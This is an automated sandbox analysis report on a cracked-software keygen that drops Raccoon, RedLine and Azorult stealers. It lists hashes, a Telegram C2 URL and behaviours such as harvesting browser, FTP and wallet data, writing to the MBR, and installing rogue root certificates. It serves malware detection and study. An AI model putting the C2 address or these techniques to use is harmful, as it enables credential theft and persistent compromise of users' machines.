Analysis
-
max time kernel
233s -
max time network
306s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-03-2021 14:26
Static task
static1
Behavioral task
behavioral1
Sample
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Resource
win7v20201028
General
-
Target
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
-
Size
36.2MB
-
MD5
865c79976b6a4688551d5be9437163aa
-
SHA1
3aa11e3924100cbb8c92c2b396eedd93279ef878
-
SHA256
c59ce6ed0ebcfce3bc9c950ac699944405a6447e40a24697482cf64a0fb37e61
-
SHA512
f728bf7eb0411c41f416b437e908e7727f3b25f91bdd1715964be37e16dfc7638e58c2874d910ef2d8c10d0c46ff39aede8e662b35f0161cd426e4b46efadb33
Malware Config
Extracted
raccoon
51c194bfb6e404af0e5ff0b93b443907a6a845b1
-
url4cnc
https://telete.in/h_focus_1
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/5220-248-0x0000000004950000-0x0000000004976000-memory.dmp family_redline behavioral1/memory/5220-241-0x0000000002580000-0x00000000025A8000-memory.dmp family_redline behavioral1/memory/6704-459-0x0000000000400000-0x0000000000426000-memory.dmp family_redline -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 48 IoCs
Processes:
KMSAuto Net.exewzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datKMSSS.exebin_x64.datbin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exewzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datKMSSS.exeSppPatcher_x64.datSppExtComObjPatcher.exeStellar.Phoenix.Data.Recovery.crack.by.orion.exekeygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exekey.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exeaskinstall20.exeStellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exepid process 1052 KMSAuto Net.exe 2600 wzt.dat 2588 certmgr.exe 984 certmgr.exe 2364 bin.dat 2608 AESDecoder.exe 3980 bin_x64.dat 3284 KMSSS.exe 3916 bin_x64.dat 2448 bin_x64.dat 1136 FakeClient.exe 1324 bin_x64.dat 3960 FakeClient.exe 1596 bin_x64.dat 3852 FakeClient.exe 428 bin_x64.dat 2912 FakeClient.exe 516 bin_x64.dat 2240 FakeClient.exe 812 bin_x64.dat 4036 FakeClient.exe 3168 bin_x64.dat 3856 FakeClient.exe 2912 bin_x64.dat 2908 FakeClient.exe 2328 bin_x64.dat 2108 FakeClient.exe 2100 wzt.dat 804 certmgr.exe 1628 certmgr.exe 3808 bin.dat 896 AESDecoder.exe 936 bin_x64.dat 588 KMSSS.exe 1680 SppPatcher_x64.dat 3792 SppExtComObjPatcher.exe 3068 Stellar.Phoenix.Data.Recovery.crack.by.orion.exe 3924 keygen-pr.exe 2576 keygen-step-1.exe 988 keygen-step-3.exe 3692 keygen-step-4.exe 2380 key.exe 2728 Setup.exe 3904 key.exe 4244 AD754B4D3FE2C4EE.exe 4252 AD754B4D3FE2C4EE.exe 4324 askinstall20.exe 4380 Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe -
Modifies Windows Firewall 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 19 IoCs
Processes:
FakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeSppExtComObj.exeMsiExec.exepid process 1136 FakeClient.exe 1136 FakeClient.exe 3960 FakeClient.exe 3852 FakeClient.exe 3852 FakeClient.exe 2912 FakeClient.exe 2912 FakeClient.exe 2240 FakeClient.exe 2240 FakeClient.exe 4036 FakeClient.exe 4036 FakeClient.exe 3856 FakeClient.exe 3856 FakeClient.exe 2908 FakeClient.exe 2908 FakeClient.exe 2108 FakeClient.exe 2108 FakeClient.exe 2324 SppExtComObj.exe 4156 MsiExec.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 123 ipinfo.io 190 ip-api.com 206 ipinfo.io 275 ipinfo.io 83 api.ipify.org 120 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
Setup.exedescription ioc process File opened for modification \??\PhysicalDrive0 Setup.exe -
Drops file in System32 directory 4 IoCs
Processes:
cmd.execmd.exedescription ioc process File created C:\Windows\System32\SppExtComObjPatcher.exe cmd.exe File opened for modification C:\Windows\System32\SppExtComObjPatcher.exe cmd.exe File created C:\Windows\System32\SppExtComObjHook.dll cmd.exe File opened for modification C:\Windows\System32\SppExtComObjHook.dll cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Setup.exepid process 2728 Setup.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
key.exedescription pid process target process PID 2380 set thread context of 3904 2380 key.exe key.exe -
Drops file in Windows directory 16 IoCs
Processes:
FakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exedescription ioc process File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe File opened for modification C:\Windows\setuperr.log FakeClient.exe File opened for modification C:\Windows\setupact.log FakeClient.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
AD754B4D3FE2C4EE.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc AD754B4D3FE2C4EE.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXENETSTAT.EXEpid process 4076 NETSTAT.EXE 2440 NETSTAT.EXE -
Kills process with taskkill 20 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1136 taskkill.exe 1256 taskkill.exe 4040 taskkill.exe 3972 taskkill.exe 3976 taskkill.exe 6712 taskkill.exe 1020 taskkill.exe 3796 taskkill.exe 4636 taskkill.exe 4160 taskkill.exe 6964 taskkill.exe 1188 taskkill.exe 2288 taskkill.exe 3684 taskkill.exe 1500 taskkill.exe 3924 taskkill.exe 3004 taskkill.exe 4976 taskkill.exe 7728 taskkill.exe 1400 taskkill.exe -
Modifies data under HKEY_USERS 13 IoCs
Processes:
reg.exeSppExtComObj.exereg.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\85dd8b5f-eaa4-4af3-a628-cce9e77c9a03 reg.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588 SppExtComObj.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588\DiscoveredKeyManagementServiceIpAddress = "1.2.3.4" SppExtComObj.exe Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663 reg.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588 SppExtComObj.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE SppExtComObj.exe Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588 reg.exe Key deleted \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f reg.exe -
Modifies registry class 2 IoCs
Processes:
Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Processes:
certmgr.execertmgr.execertmgr.exeaskinstall20.execertmgr.exeSetup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8 certmgr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8 certmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8 certmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8 certmgr.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98 certmgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 7 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 4920 PING.EXE 5716 PING.EXE 6224 PING.EXE 2244 PING.EXE 4432 PING.EXE 4164 PING.EXE 4924 PING.EXE -
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 122 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 127 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 201 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 217 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 274 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
KMSAuto Net.exeSppExtComObjPatcher.exekey.exepid process 1052 KMSAuto Net.exe 1052 KMSAuto Net.exe 1052 KMSAuto Net.exe 1052 KMSAuto Net.exe 1052 KMSAuto Net.exe 1052 KMSAuto Net.exe 1052 KMSAuto Net.exe 1052 KMSAuto Net.exe 1052 KMSAuto Net.exe 1052 KMSAuto Net.exe 1052 KMSAuto Net.exe 3792 SppExtComObjPatcher.exe 3792 SppExtComObjPatcher.exe 3792 SppExtComObjPatcher.exe 3792 SppExtComObjPatcher.exe 3792 SppExtComObjPatcher.exe 3792 SppExtComObjPatcher.exe 2380 key.exe 2380 key.exe -
Suspicious behavior: LoadsDriver 8 IoCs
Processes:
